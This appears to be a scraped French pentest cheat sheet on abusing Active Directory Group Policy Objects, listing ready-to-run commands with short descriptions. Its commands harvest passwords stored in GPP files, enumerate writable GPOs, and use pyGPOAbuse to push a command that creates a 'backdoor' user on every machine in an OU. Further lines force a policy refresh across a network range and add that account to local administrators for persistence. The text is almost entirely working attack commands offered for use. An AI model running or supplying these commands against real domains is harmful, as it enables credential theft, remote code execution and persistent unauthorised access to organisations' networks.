nxc smb $DC -u $USER -p $PASS -M gpp_passwordDescription: Chercher des mots de passe dans les GPP : encore présents sur beaucoup d'environnements anciens.
Exploitation
Identifier et modifier des GPOs pour exécuter du code sur les machines d'une OU.
nxc smb $DC -u $USER -p $PASS -M gpp_passwordDescription: Chercher des mots de passe dans les GPP : encore présents sur beaucoup d'environnements anciens.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --filter '(objectClass=groupPolicyContainer)' --attr displayName,gPCFileSysPathDescription: Lister les GPOs et leurs chemins SYSVOL pour identifier celles qu'on peut modifier.
bloodhound-python -u $USER -p $PASS -d $DOMAIN -ns $DC -c GPO --zipDescription: Collecter les données GPO pour BloodHound : identifier les chemins de contrôle de GPO.
nxc smb $DC -u $USER -p $PASS -x 'gpresult /R'Description: Vérifier quelles GPOs s'appliquent à la machine cible : identifier les GPOs contrôlables.
pyGPOAbuse.py -u $USER -p $PASS -d $DOMAIN -dc-ip $DC -gpo-id '$GPO_ID' -command 'net user backdoor Pass123! /add'Description: Modifier une GPO pour exécuter une commande sur les machines de l'OU cible au prochain refresh.
nxc smb $CIDR -u $USER -p $PASS -x 'gpupdate /force'Description: Forcer l'application immédiate de la GPO modifiée sur les machines cibles.
nxc smb $DC -u $USER -p $PASS -x 'net localgroup administrators backdoor /add'Description: Ajouter le backdoor créé aux admins locaux pour maintenir l'accès.